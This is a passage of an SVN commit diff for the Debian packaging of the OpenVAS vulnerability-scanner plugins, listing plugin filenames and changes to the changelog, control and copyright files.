+lotus_smency.nasl +lovgate_virus_installed.nasl +lpd_aix_overflow.nasl +lpd_bsd_overflow.nasl +lpd_dvips.nasl +lpd_freebsd_overflow.nasl +lpd_overflow.nasl +LPRng.nasl +macos_x_directory_svc_dos.nasl +Macromedia_ColdFusion_MX_Path_Disclosure_Vulnerability.nasl +mailenable_httpmail_authorization_dos.nasl +mailenable_httpmail_content_length_overflow.nasl +mailenable_imap_search_dos.nasl +mailman_password_retrieval.nasl +mailman_webmail.nasl +mailmax_imap_overflows2.nasl +mailmax_imap_overflows.nasl +mailmaxweb_path_disclosure.nasl +mailnews.nasl +mailreader.nasl +maincfgret.nasl +mambo.nasl +mambo_xss.nasl +manpage_file_disclosure.nasl +marconi_dos.nasl +master_index_search.nasl +mcafee_installed.nasl +mcms_overflow.nasl +mdaemon_create_overflow.nasl +mdaemon_dele_dos.nasl +mdaemon_dos.nasl +mdaemon.nasl +mdaemon_webconfig.nasl +mdaemon_worldclient.nasl 
+mdbms_overflow.nasl +mediahouse_statistics_server.nasl +merak_multiple_vulns.nasl +mercure_expn_overflow.nasl +mercure_imap_read_any_file.nasl +mercure_webview.nasl +metadot_sql_injection.nasl +metainfo_mail.nasl +mibiisa_overflow.nasl +minibb_xss.nasl +minivend_view_page.nasl +miscflood.nasl +misc_format_string.nasl +misc_func.inc +mkilog.nasl +mldonkey_telnet.nasl +mldonkey_www.nasl +mod_access_referer.nasl +mod_auth_any.nasl +mod_frontpage.nasl +mod_jk_chunked_encoding_dos.nasl +mod_ntlm.nasl +mod_rootme_backdoor.nasl +mod_ssl_offby1.nasl +mod_ssl_overflow.nasl +moniwiki_xss.nasl +moodle_xss.nasl +mountd_overflow.nasl +mpcsw_guestbook_database.nasl +msadcs_dll.nasl +msadcs_overflow.nasl +msftp_dos.nasl +ms_index_server.nasl +msmmask.nasl +mspws_dotdotdot.nasl +msql_overflow.nasl +ms_siteserver_info_disclosure.nasl +mssmtp_dos.nasl +mssmtp_null_auth.nasl +mssql_litchfield_overflows.nasl +mssqlserver_detect.nasl +mssqlserver_dos.nasl +mssql_version.nasl +ms_telnet_overflow.nasl +mstream_agent.nasl +mstream_handler.nasl +multicsp_detect.nasl +multihtml.nasl +multitech_proxy_default_pwd.nasl +MyAbraCadaWeb_XSS.nasl +myguestbk_admin_access.nasl +my_little_forum_xss.nasl +myphpPageTool_code_injection.nasl +myserver_traversal.nasl +mysql_bad_password.nasl +mysql_buff_overflow.nasl +mysql_double_free.nasl +mysql_flaws.nasl +mysql_hotcopy_tempfile.nasl +mysql_multiple_flaws2.nasl +mysql_multiple_flaws.nasl +mysql_unpassworded.nasl +mysql_version.nasl +nai_webshield_info.nasl +nai_webshield_overflow.nasl +napster_detect.nasl +nav_installed.nasl +nbmember_info_disclosure.nasl +ncbook_cgi.nasl +ncl_items_2.nasl +ncl_items.nasl +ndcgi.nasl +nds_web_based_browsing.nasl +neoteris_ive_xss.nasl +nessus_detect.nasl +nestea.nasl +netauth.nasl +netbeans.nasl +netbus2.nasl +netbus.nasl +netcharts_default_password.nasl +netcommerce_sql.nasl +netgear_password_disclosure.nasl +netgear_prosafe_dos.nasl +netobserve_command_execution.nasl +netscape_accept_overflow.nasl 
+netscape_adminpw.nasl +netscape_crash.nasl +netscape_entreprise_dot_overflow.nasl +netscape_entreprise_index.nasl +netscape_fasttrack.nasl +netscape_imap_overflow.nasl +netscape_PageServices.nasl +netscape_pop_auth.nasl +netscape_publishing_expert_psuser.nasl +netscape_server_default_files.nasl +netscape_wp_tag.nasl +NetSphere.nasl +netstat.nasl +nettools_cmd_exec.nasl +netware_ldap_search_request.nasl +netware_post_perl.nasl +netware_tomcat_sourcecode_viewer.nasl +newdsn.nasl +newsdesk.nasl +nfs_dotdot.nasl +nfs_fsirand.nasl +nfs_func.inc +nfs_mount.nasl +nfs_portmap.nasl +nimda.nasl +nisd_overflow.nasl +nis_get_passwd_map.nasl +nis_server.nasl +no404.nasl +nokia_readfile.nasl +nortel_annex_default_pass.nasl +nortel_baystack_default_pass.nasl +nortel_cgiproc_dos.nasl +nortel_passport_default_pass.nasl +nortel_pwdless1.nasl +nortel_pwdless2.nasl +notes_detection.nasl +notesinicheck.nasl +notes_mta_dos.nasl +novell_border_manager.nasl +novell_groupwise_servletmanager_default_password.nasl +novell_groupwise_webacc_information_disclosure.nasl +novell_netbasic_directory_traversal.nasl +novell_novonyx_default_files.nasl +novell_viewcode.nasl +nph-publish.nasl +nph-test-cgi.nasl +nqt_xss.nasl +nsm_format_strings.nasl +ntalk_detect.nasl +ntds_get_info.nasl +nt_ftp_guest.nasl +ntp_overflow.nasl +nt_spam.nasl +nuked_clan_cmd_exec.nasl +nuked_klan_xss.nasl +nx_web_content_file_include.nasl +oas_overflow.nasl +ocean12_db_download.nasl +ocean12_guestbook_xss.nasl +odbc_tools_check.nasl +office_files.nasl +officescan_disclosure.nasl +OmniHTTPd_pro_post_dos.nasl +oops_overflow.nasl +openbb_sql_injection.nasl +openlink_overflow.nasl +openssh_231.nasl +openssh_301.nasl +openssh_33.nasl +openssh_adv_option.nasl +openssh_afs.nasl +openssh_channel.nasl +openssh_pam_timing.nasl +openssh_uselogin_environment.nasl +openssh_uselogin.nasl +openssl_overflow_generic_test.nasl +openssl_password_interception.nasl +openwebmail_cmd_exec.nasl +openwebmail_detect.nasl 
+openwebmail_userstat_command_execution.nasl +openwebmail_vacation_input_validation.nasl +opera_heap_corruption.nasl +opera_multiple_flaws.nasl +oracle9iAS_slashdot_DoS.nasl +oracle9iAS_too_long_url.nasl +oracle9i_isqlplus_xss.nasl +oracle9i_mod_plsql_config.nasl +oracle9i_owautil.nasl +oracle9i_portaldemo_orgchart.nasl +oracle9i_soapconfig.nasl +oracle9i_soapdocs.nasl +oracle_dos.nasl +oracle_link_overflow.nasl +oracle_tnslsnr_version.nasl +oracle_web_admin_server.nasl +oracle_xsql.nasl +oracle_xsql_query.nasl +orange_dos.nasl +oscommerce_file_manager_disclosure.nasl +oscommerce_session_id_xss.nasl +osCommerce_xss.nasl +oshare.nasl +ospf_detect.nasl +osticket_attachment_code_execution.nasl +osticket_backdoored.nasl +osticket_detect.nasl +osticket_large_attachment_upload.nasl +osticket_setup_php_accessible.nasl +osticket_view_attachments.nasl +osX_apache_finder_content.nasl +osX_apache_finder.nasl +owa-anonymous.nasl +owls_file_disclosure.nasl +ows_bin_cgi.nasl +ows_overflow.nasl +pafiledb_sql_injection.nasl +pafiledb_xss.nasl +pagelog_cgi.nasl +PagesPro_dir_trav.nasl +pals_cgi.nasl +pam_smb.nasl +passwordless_cayman_router.nasl +passwordless_hp_printer.nasl +passwordprotect_sql_inject.nasl +PC_anywhere_tcp.nasl +pccsmysqladm.nasl +perl_browseable.nasl +perl_cal.nasl +perl_cgi.nasl +perlIS_dll_bufferoverflow.nasl +pfdipaly.nasl +pftp.nasl +pgpmail.nasl +phf.nasl +phonebook.nasl +phorum.nasl +php_4_2_x_malformed_POST.nasl +php_4_3_0.nasl +php_4_3_x_safe_mode_include.nasl +php4_path_disclosure.nasl +PHPAdsNew.nasl +phpay_info_disclosure.nasl +php_file_upload.nasl +phpgedview_multiple_flaws.nasl +php_imap_overflow.nasl +phpinfo.nasl +phpix.nasl +php_log.nasl +phpMyAdmin_file_reading.nasl +phpMyExplorer.nasl +php.nasl +php_nuke_admin_cp.nasl +php_nuke_bb_smilies_passwd.nasl +php_nuke_galleryaddon.nasl +php_nuke_installed.nasl +php_nuke_opendir.nasl +php_nuke_sql_debug.nasl +php_overflow.nasl +phpPgAdmin_file_reading.nasl +php_ping_code_execution.nasl 
+phpping_code_execution.nasl +php_safe_mode.nasl +phpshop_sql_injection.nasl +php_socket_iovec_alloc_overflow.nasl +php_split_mime.nasl +phptonuke_dir_trav.nasl +pi3web_dos.nasl +pi3web_isapi.nasl +pimp.nasl +ping_asp.nasl +ping_host.nasl +pinnacle_sc_skin_dos.nasl +pinnacle_xss.nasl +piranha.nasl +pirelli_router_default_password.nasl +pivot_file_inclusion.nasl +playsms_sql_inject.nasl +plusmail.nasl +pmcrash.nasl +pnserver.nasl +poc32.nasl +pollit.nasl +pop3_overflow.nasl +popper_mod.nasl +popserver_detect.nasl +poptop_negative_read.nasl +portal_of_doom.nasl +postgresql_multiple_flaws.nasl +postgresql_toascii_overflow.nasl +postgresql_unpassworded.nasl +postnuke_info_disclosure.nasl +powerplay.nasl +powerportal_path_disclosure.nasl +powerup_information_disclosure.nasl +pptp_detect.nasl +printenv.nasl +processit.nasl +proftpd_1_2_0_rc2.nasl +proftpd_debian.nasl +proftpd_exhaust.nasl +proftpd_mkdir_overflow.nasl +proftpd_overflow.nasl +proftpd_pre10.nasl +proftpd_pre6_exploit.nasl +proxy_connect.nasl +proxy_gopher.nasl +proxy_port.nasl +proxy_post.nasl +proxy_use.nasl +psychoblogger_sql_injection.nasl +ptnews_admin.nasl +qmtp_detect.nasl +qpopper_euidl.nasl +qpopper_list.nasl +qpopper.nasl +qpopper_qvsnprinf_overflow.nasl +quickstore2.nasl +quickstore.nasl +quicktime_admin.nasl +quicktime_player_overflow.nasl +quixplorer_file_disclosure.nasl +quote.nasl +radmin_detect.nasl +ramcrash.nasl +raptor_isn.nasl +RA_www_css.nasl +RA_www_detect.nasl +rbs.nasl +readdesigncheck.nasl +realplayer_png_heap_corruption.nasl +realserver_disclosure.nasl +realserverg2.nasl +realserver_ussr_dos.nasl +record_route.nasl +remwatch.nasl +resin_server_status.nasl +resin_traversal.nasl +reviewpost_sql.nasl +rexecd.nasl +rfparalyze.nasl +rfpoison.nasl +rh_inetd.nasl +rich_media_ecommerce_stores_sensitive_information_insecurely.nasl +rip_detect.nasl +rip_poison.nasl +ris_detect.nasl +risearch_arbitrary_file_access.nasl +rlogin_froot.nasl +rlogin.nasl +roads_cgi.nasl 
+rockliffe_mailsite_overflow.nasl +rot13sj.nasl +rover_pop3_overflow.nasl +roxen_counter.nasl +roxen_percent.nasl +rpc_3270.nasl +rpc_alis.nasl +rpc_amd.nasl +rpc_automountd.nasl +rpc_cmsd.nasl +rpc_cmsd_overflow.nasl +rpc_database.nasl +rpc_dmispd.nasl +rpc_etherstatd.nasl +rpc_fam.nasl +rpcinfo.nasl +rpc_kcms.nasl +rpc_keyserv.nasl +rpc_llockmgr.nasl +rpc_nfsd.nasl +rpc_nlockmgr.nasl +rpc_nsed.nasl +rpc_nsemntd.nasl +rpc_portmap.nasl +rpc_rexd.nasl +rpc_rje_mapper.nasl +rpc_rquotad.nasl +rpc_rstatd.nasl +rpc_rusers.nasl +rpc_sadmin.nasl +rpc_sched.nasl +rpc_selection.nasl +rpc_showfhd.nasl +rpc_snmp.nasl +rpc_sprayd.nasl +rpc_statd.nasl +rpc_statmon.nasl +rpc_sunlink_mapper.nasl +rpc_tfsd.nasl +rpc_tooltalk_format_string.nasl +rpc_tooltalk.nasl +rpc_walld.nasl +rpc_X25.nasl +rpc_xdrmem_bytes.nasl +rpc_ypbind.nasl +rpc_yppasswd.nasl +rpc_ypupated.nasl +rpc_ypxfrd.nasl +rpm_query.nasl +rsh.nasl +rsh_null.nasl +rsh_users.nasl +rsync_array_overflow.nasl +rsync_modules.nasl +rtsp_detect.nasl +rusers_output.nasl +rwalld_format_string.nasl +rwhois_format_string2.nasl +rwhois_format_string.nasl +samba_arbitrary_file_creation.nasl +samba_frags_overflow.nasl +samba_possible_overflow.nasl +sambar_cgi.nasl +sambar_cgi_path_disclosure.nasl +sambar_default_accounts.nasl +sambar_DoS.nasl +sambar_info_disclosure.nasl +sambar_mailit.nasl +sambar_plaintext.nasl +sambar_search_cgi.nasl +sambar_sendmail.nasl +sambar_sysadmin.nasl +sambar_xss.nasl +samba_tng_flaws.nasl +samba_trans2open_overflow.nasl +samba_unicode_overflow.nasl +samihttp_1_0_4.nasl +sapdb_detect.nasl +savant_cgi_download.nasl +savant_cgitest.nasl +savant_percent_dos.nasl +sawmill.nasl +sawmill_password.nasl +scozbook.nasl +scriptlogic_hidden_share.nasl +sdbsearch.nasl +sedum_dos.nasl +sendmail_bt_switch.nasl +sendmail_conversion_overflow.nasl +sendmail_decode.nasl +sendmail_dns_map_txt_overflow.nasl +sendmail_expn.nasl +sendmail_ident.nasl +sendmail_local_overflow.nasl +sendmail_mime_overflow2.nasl 
+sendmail_mime_overflow.nasl +sendmail_redirection.nasl +sendmail_sun_forward.nasl +sendtemp.nasl +servletExec_File_Reading.nasl +servletExec_Path_Disclosure.nasl +sfm_xss.nasl +sgdynamo_path.nasl +sgdynamo_xss.nasl +sgi_rpc_passwd.nasl +sglmerchant_information_disclosure.nasl +shaft.nasl +shareaza_network.nasl +sheerdns_traversal.nasl +shells.nasl +shlwapi_dll_dos.nasl +SHN_discard.nasl +SHN_MySQL_Privilege_Escalation.nasl +shopping_cart_information_disclosure.nasl +shopplus_information_disclosure.nasl +shoutcast_admin_cgi_overflow.nasl +shoutcast_version.nasl +ShowCode.nasl +showmount.nasl +silverstream_database.nasl +silverstream_dirlisting.nasl +SimpleBBS_users_disclosure.nasl +simple_chat_user_disclosure.nasl +simple_form_mail_relaying.nasl +simple_form_mail_relaying_via_subject_tags.nasl +singapore_file_disclosure.nasl +sip_detection.nasl +sip_status_server.nasl +siteframe_xss.nasl +sitescope_management_server.nasl +sitescope_web_admin_server.nasl +siteUserMod.nasl +six_webboard.nasl +slmail27.nasl +slmail_helo.nasl +slmail.nasl +slmail_smtp_overflows.nasl +slmail_webmail_flaws.nasl +small_ftp_traversal.nasl +smartserver_pop_overflow.nasl +smb2www_cmd_exec.nasl +smb2www_installed.nasl +smb_accessible_shares.nasl +smb_bruteforce_pass.nasl +smb_crash_winlogon.nasl +smb_dom2sid.nasl +smb_enum_services.nasl +smb_enum_shares.nasl +smb_group_account_op.nasl +smb_group_admin.nasl +smb_group_backup_op.nasl +smb_group_domain_admin.nasl +smb_group_print_op.nasl +smb_group_replicator.nasl +smb_groups_guest.nasl +smb_group_system_op.nasl +smb_host2sid.nasl +smb_lanman_browse_list.nasl +smb_localusers_autodisabled.nasl +smb_localusers_changepw.nasl +smb_localusers_disabled.nasl +smb_localusers_lastpwchange.nasl +smb_localusers_neverloggedon.nasl +smb_localusers_pwexpiry.nasl +smb_login_as_e.nasl +smb_login_as_users.nasl +smb_login_as_x.nasl +smb_login_deloder.nasl +smb_login.nasl +smb_mssql7.nasl +smb_nativelanman.nasl +smb_netusergetaliases.nasl 
+smb_netusergetgroups.nasl +smb_netusergetinfo_local.nasl +smb_netusergetinfo.nasl +smb_nt.inc +smb_nt_kb870669.nasl +smb_nt_ms00-029.nasl +smb_nt_ms00-035.nasl +smb_nt_ms00-036.nasl +smb_nt_ms00-047.nasl +smb_nt_ms00-052.nasl +smb_nt_ms00-053.nasl +smb_nt_ms00-062.nasl +smb_nt_ms00-065.nasl +smb_nt_ms00-066.nasl +smb_nt_ms00-067.nasl +smb_nt_ms00-070.nasl +smb_nt_ms00-086.nasl +smb_nt_ms00-089.nasl +smb_nt_ms00-091.nasl +smb_nt_ms01-003.nasl +smb_nt_ms01-008.nasl +smb_nt_ms01-009.nasl +smb_nt_ms01-011.nasl +smb_nt_ms01-025.nasl +smb_nt_ms01-046.nasl +smb_nt_ms01-048.nasl +smb_nt_ms02-001.nasl +smb_nt_ms02-003.nasl +smb_nt_ms02-005.nasl +smb_nt_ms02-006.nasl +smb_nt_ms02-008.nasl +smb_nt_ms02-009.nasl +smb_nt_ms02-013.nasl +smb_nt_ms02-014.nasl +smb_nt_ms02-016.nasl +smb_nt_ms02-017.nasl +smb_nt_ms02-018.nasl +smb_nt_ms02-021.nasl +smb_nt_ms02-024.nasl +smb_nt_ms02-025.nasl +smb_nt_ms02-026.nasl +smb_nt_ms02-029.nasl +smb_nt_ms02-030.nasl +smb_nt_ms02-031.nasl +smb_nt_ms02-032.nasl +smb_nt_ms02-035.nasl +smb_nt_ms02-042.nasl +smb_nt_ms02-045.nasl +smb_nt_ms02-048.nasl +smb_nt_ms02-050.nasl +smb_nt_ms02-051.nasl +smb_nt_ms02-052.nasl +smb_nt_ms02-054.nasl +smb_nt_ms02-055.nasl +smb_nt_ms02-060.nasl +smb_nt_ms02-063.nasl +smb_nt_ms02-070.nasl +smb_nt_ms02-071.nasl +smb_nt_ms02-072.nasl +smb_nt_ms03-001.nasl +smb_nt_ms03-005.nasl +smb_nt_ms03-007.nasl +smb_nt_ms03-008.nasl +smb_nt_ms03-009.nasl +smb_nt_ms03-010.nasl +smb_nt_ms03-011.nasl +smb_nt_ms03-012.nasl +smb_nt_ms03-013.nasl +smb_nt_ms03-017.nasl +smb_nt_ms03-021.nasl +smb_nt_ms03-023.nasl +smb_nt_ms03-024.nasl +smb_nt_ms03-041.nasl +smb_nt_ms03-042.nasl +smb_nt_ms03-043.nasl +smb_nt_ms03-045.nasl +smb_nt_ms04-001.nasl +smb_nt_ms04-016.nasl +smb_nt_ms04-029.nasl +smb_null_params_dos.nasl +smb_reg_autologon.nasl +smb_reg_cachedlogons.nasl +smb_reg_dontshowlastusername.nasl +smb_reg_hklm.nasl +smb_registry_access.nasl +smb_registry_full_access.nasl +smb_reg_logonscreen.nasl +smb_reg_missing_winreg.nasl 
+smb_reg_nodialin.nasl +smb_reg_pdc.nasl +smb_reg_ras_access.nasl +smb_reg_run_permissions.nasl +smb_reg_schedule.nasl +smb_reg_service_pack.nasl +smb_reg_service_pack_W2K.nasl +smb_reg_sfcdisable.nasl +smb_reg_trojan_paths.nasl +smb_reg_winlogon_permissions.nasl +smb_reg_winvnc_perms.nasl +smb_scope.nasl +smb_sid2localuser.nasl +smb_sid2user.nasl +smb_svc_alerter.nasl +smb_svc_messenger.nasl +smb_svc_scriptlogic.nasl +smb_users_autodisabled.nasl +smb_users_changepw.nasl +smb_users_disabled.nasl +smb_users_lastpwchange.nasl +smb_users_neverloggedon.nasl +smb_users_pwexpiry.nasl +smb_virii.nasl +smb_xp_ms01-059.nasl +smc2804wbr_default_password.nasl +smtp_bounce.nasl +smtp_bypass_cisco.nasl +smtp_file.nasl +smtp_helo.nasl +smtp_ms01-037.nasl +smtp_program.nasl +smtp_relay2.nasl +smtp_relay.nasl +smtp_settings.nasl +snapstream_dir_trav.nasl +sniff_css.nasl +sniff_file_disclosure.nasl +snitz_down_http_xss.nasl +snitz_forums_2000_sql_injection.nasl +snitz_forums_2000_xss.nasl +snmp_cisco_type.nasl +snmp_dlink_user_pass_disclosure.nasl +snmp_dos.nasl +snmp_ifaces.nasl +snmp_lanman_services.nasl +snmp_lanman_shares.nasl +snmp_lanman_users.nasl +snmp_oversized_length_field_dos.nasl +snmp_oversized_length_field_two.nasl +snmp_processes.nasl +snmp_sysDesc.nasl +snmp_vacm.nasl +snmpwalk_portscan.nasl +snmpXdmid.nasl +socks4a_hostname_overflow.nasl +socks4_username_overflow.nasl +socks.nasl +sojourn.nasl +solaris_lpd_env_cmd_exec.nasl +source_routed.nasl +spinclient.nasl +sql_injection.nasl +sqlqhit_information_disclosure.nasl +squid_overflows.nasl +squirrelmail_detect.nasl +squirremail_cross_site_scripting.nasl +sscd_input.nasl +ssh1_proto_enabled.nasl +ssh3_passwd.nasl +ssh_AllowedAuthentications.nasl +ssh_bruteforce.nasl +ssh_crc32.nasl +ssh_detect.nasl +ssh_dropbear.nasl +ssh_forwarding.nasl +ssh_func.inc +ssh_insertion.nasl +ssh_kerberos.nasl +ssh_keygen.nasl +ssh_multivulns_16122002.nasl +ssh_overflow.nasl +ssh_proto_version.nasl +ssh_scp.nasl +ssh_setsid.nasl 
+stacheldraht.nasl +statd_format_string.nasl +stockman_shopping_cart_cmd_exec.nasl +stockman_shopping_cart_path_disclosure.nasl +store_cgi.nasl +story.nasl +stream.nasl +stronghold.nasl +stronghold_swish.nasl +stun_detection.nasl +subseven.nasl +sun_cobalt_adaptive_firewall_detect.nasl +sunkill.nasl +superguestbook_config_disclosure.nasl +surgeldap_file_disclosure.nasl +suse_cgi_bin_sdb.nasl +suse_identd.nasl +swat_detect.nasl +swat_guessable_usernames.nasl +swc_overflow.nasl +sygate_remote_control.nasl +synchrologic_detect.nasl +systat.nasl +tanned_format_string.nasl +tcp_chorusing.nasl +tcp_seq.nasl +teardrop.nasl +technote.nasl +telnet_func.inc +telnet.nasl +telnetserver_detect_type_nd_version.nasl +TelSrv_DoS.nasl +teso_telnet.nasl +test-cgi.nasl +texis_info_disclosure.nasl +texis_path_disclosure.nasl +textcounter_pl.nasl +tfn.nasl +tfs_smtp_overflow.nasl +theserver_cleartext.nasl +thttpd_buffer_overflow.nasl +thttpd_bug.nasl +thttpd_ssi.nasl +thttpd_virtualhost_escape.nasl +tiny_proxy_heap_overflow.nasl +tivoli_relay_overflow.nasl +tmosdos.nasl +tomcat_admin.nasl +tomcat_directory_listing_and_file_disclosure.nasl +tomcat_path_disclosure.nasl +tomcat_server_default_files.nasl +tomcat_snoop.nasl +tomcat_source_exposure.nasl +tomcat_srcjsp_malformed_request.nasl +tomcat_status.nasl +torturecgis.nasl +traceroute.nasl +translate_f.nasl +trendmicro_emanager.nasl +trinity.nasl +trinoo.nasl +trojan_horses.nasl +truegalerie_admin_bypass.nasl +ttawebtop.nasl +ttcms_code_injection.nasl +ttyprompt.nasl +typo3_dev_read.nasl +ultraseek_dos.nasl +unicast_dos.nasl +unknown_services.nasl +unreal_game_engine.nasl +upb_info_leak.nasl +upload_cgi.nasl +uploader_exe.nasl +upload_lite_cgi.nasl +uploadskrip.nasl +usermin_session_id.nasl +ustorekeeper.nasl +uw_imap_overflow.nasl +uw_imap_overflow_two.nasl +vbulletin_calender_command_execution.nasl +vchat_logs.nasl +vftpd_overflow.nasl +viewcvs_xss.nasl +viewpage_file_reading.nasl +view_source_cgi.nasl +vignette_info_leak.nasl 
+viralator.nasl +visadmin.nasl +vnc_http.nasl +vpasswd_cgi.nasl +vpop_input_validation.nasl +vpopmail_cmd_exec.nasl +vssetcookie.nasl +vw_bof.nasl +W32.Sasser.Worm.nasl +w32_spybot_worm_variant.nasl +w3msql_overflow.nasl +wayboard.nasl +webactive_log.nasl +webadmin.nasl +webalizer.nasl +webcart_cmd_exec.nasl +webcart.nasl +webc_cgi_installed.nasl +webc_cgi_overflows.nasl +webchat_code_injection.nasl +web_chat_xss.nasl +webdav_enabled.nasl +webdav_iis.nasl +webdav.nasl +webdist.nasl +webdriver.nasl +webfind.nasl +webgais.nasl +weblogic_hostname_disclosure.nasl +weblogic_percent.nasl +webmin.nasl +webmin_session_id.nasl +webmirror.nasl +webnews.nasl +webplus_install_path.nasl +webplus.nasl +webplus_version.nasl +websendmail.nasl +webserver_robot.nasl +webshield.nasl +WebSite.nasl +website_pro.nasl +websitepro_overflow.nasl +webspeed.nasl +websphere_cache_DoS.nasl +websphere_xss.nasl +webspirs_cgi.nasl +web_traversal.nasl +webweaver_retr_dos.nasl +webwho_pl.nasl +webwiz_forum_password_disclosure.nasl +webwiznews_password_disclosure.nasl +wftp_241_dos.nasl +wftp_dos.nasl +wftp.nasl +whois_raw.nasl +wihphoto_file_read.nasl +winamp_buffer_overflow.nasl +windmail.nasl +windows_asn1_vuln_ntlm.nasl +windows_terminal_services.nasl +wingate_denial.nasl +wingate.nasl +wingate_user.nasl +winmessenger_installed.nasl +winmx_installed.nasl +winnt_dns_flood.nasl +winnt_pptp_dos.nasl +winnuke.nasl +wins_udp_flood.nasl +win_trinoo.nasl +wireless_sensor_detection.nasl +wnn_overflow.nasl +wordit_logbook.nasl +worldclient_server_detection.nasl +worm_netsky_b.nasl +wowBB_flaws.nasl +wrap.nasl +ws4d_overflow.nasl +wu_ftpd_glob.nasl +wu_ftpd_overflow.nasl +wu_ftpd_pasv_format_string.nasl +wu_ftpd_site_newer.nasl +wwwboardpwd.nasl +www_default_page.nasl +www_fingerprinting_hmap.nasl +www_too_long_auth.nasl +www_too_long_post.nasl +www_too_long_url.nasl +wwwwais.nasl +xedus_detect.nasl +xedus_xss.nasl +xfs_overflow.nasl +xitami_overflow.nasl +xmail_overflow.nasl +xmb_sql_injection.nasl 
+xmb_xss.nasl +X.nasl +xnews.nasl +xolox_installed.nasl +xoops_myheader_url_xss.nasl +xoops_path_disclosure.nasl +xoops_viewtopic_xss.nasl +xoops_xss.nasl +xst_http_trace.nasl +xtel_detect.nasl +xtelw_detect.nasl +xtramail_control.nasl +xtramail_helo.nasl +xtramail_pop_overflow.nasl +xtux_server.nasl +yabb.nasl +yabbse_cmd_exec.nasl +yahoo_installed.nasl +yppasswdd.nasl +zeus.nasl +zml_cgi_traversal.nasl +zope_dos.nasl +zope_img_updating.nasl +zope.nasl Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -1,5 +1,32 @@ -openvas-plugins (1.0.7-1) unstable; urgency=low +openvas-plugins (1.0.2-1) unstable; urgency=low - * initial release + * New upstream release. + * Make the debian/rules file use the audit architecture written for the + nessus-plugins package and available in upstream's audit dir. + * Make fixes to upstreams' audit infrastructure (committed to SVN should be + removed in the next release) - -- Jan Wagner Fri, 18 Sep 2009 13:05:59 +0200 + -- Javier Fernandez-Sanguino Pen~a Fri, 22 Aug 2008 03:10:27 +0200 + +openvas-plugins (1.0.1-1) UNRELEASED; urgency=low + + * New upstream release + * change build dependency from openvas-server to openvas-server-dev + * add libopenvasnasl1-dev, libgnutls-dev and dpatch to build dependencies + * include dpatch infrastructure + * prevent removing of libtool when running make distclean via + 01_makefile_fix_distclean.dpatch + * adjust examples via 02_adjust_examples.dpatch and remove homebrew patching + * bump versioned dependency of debhelper to ">=5.0.0", since compat is "5" + * bump standards-version to 3.7.2 since we should comply at least + * remove debian/substvars + + -- Jan Wagner Mon, 16 Jun 2008 23:13:17 +0200 + +openvas-plugins (0.9.1-1) UNRELEASED; urgency=low + + * First release + + -- Javier Fernandez-Sanguino Pen~a Wed, 31 Oct 2007 21:55:35 +0100 + + Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -1,27 +1,18 @@ Source: openvas-plugins Section: admin Priority: optional -Maintainer: Debian OpenVAS Maintainers -Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5), dpatch, libopenvas2-dev, openvas-server-dev (>= 1.0), libopenvasnasl2-dev, libgmp3-dev, libz-dev, libpcap-dev, libnet1-dev, libgnutls-dev, libglib2.0-dev -Homepage: http://www.openvas.org/ -Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/?root=openvas -Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/ -Standards-Version: 3.8.3 +Maintainer: Javier Fernandez-Sanguino Pen~a +Build-Depends: debhelper (>= 5.0.0), dpatch, libopenvas1-dev (>= 1.0), openvas-server-dev (>= 1.0), libopenvasnasl1-dev, libgmp3-dev, libz-dev, libpcap0.8-dev | libpcap-dev, nmap, libnet1-dev, libgnutls-dev +Standards-Version: 3.7.2 +Homepage: http://www.openvas.org Package: openvas-plugins -Section: net Architecture: any -Depends: ${shlibs:Depends}, ${misc:Depends} -Recommends: openvas-server (>= 1.0), rsync, nmap, smbclient -Suggests: openvas-client, snmp, pnscan, strobe, ike-scan -Description: remote network security auditor - plugins - The Open Vulnerability Assessment System is a modular security auditing - tool, used for testing remote systems for vulnerabilities that should be - fixed. +Depends: ${shlibs:Depends}, debconf | debconf-2.0 +Recommends: wget, openvas-server (>= 1.0), nmap, snmp +Description: OpenVAS vulnerability tests + OpenVAS is a network security scanner. It makes possible to test the security + of remote hosts in an attempt to find vulnerable spots that should be fixed. . - It is made up of two parts: a server, and a client. The server/daemon, - openvasd, is in charge of the attacks, whereas the client, - OpenVAS-Client, provides an X11/GTK+ user interface. - . 
- This package provides the infrastructure for using the plugin feed. + This package contains the OpenVAS plugins, a set of security tests as well + as scripts to build additional plugins. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -1,83 +1,480 @@ This package is based on the nessus-plugins package, which was debianized by Josip Rodin on 2 Oct 1999. -It was downloaded from http://www.openvas.org/ +Original sources for this software can be found at: http://www.openvas.org/ -Upstream Author: OpenVAS +This package is Copyright (C) 1998 - 2007 Renaud Deraison and others. +[ For specific (c) statements see the individual files. ] +[ NOTE: The LICENSE.txt file distributed in the source package describes + Tenable's License which does not apply to the GPL Nessus plugins ] -Copyright holders: - * Renaud Deraison - * Per Bothner - * Gordon Matzigkeit - * Lukas Grunwald - * Jan-Oliver Wagner - * Michel Arboi - * Michel Arboi +The binary code of this package is distributed under the +GNU General Public License v2. -License: +This package also provides the update-nessus-plugins and +describe-nessus-plugin scripts (provided in the examples directory). +These are copyright (c) 2003, George A. Theall +and they were downloaded from +http://www.tifaware.com/perl/update-nessus-plugins/ +and +http://www.tifaware.com/perl/describe-nessus-plugin/ - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later 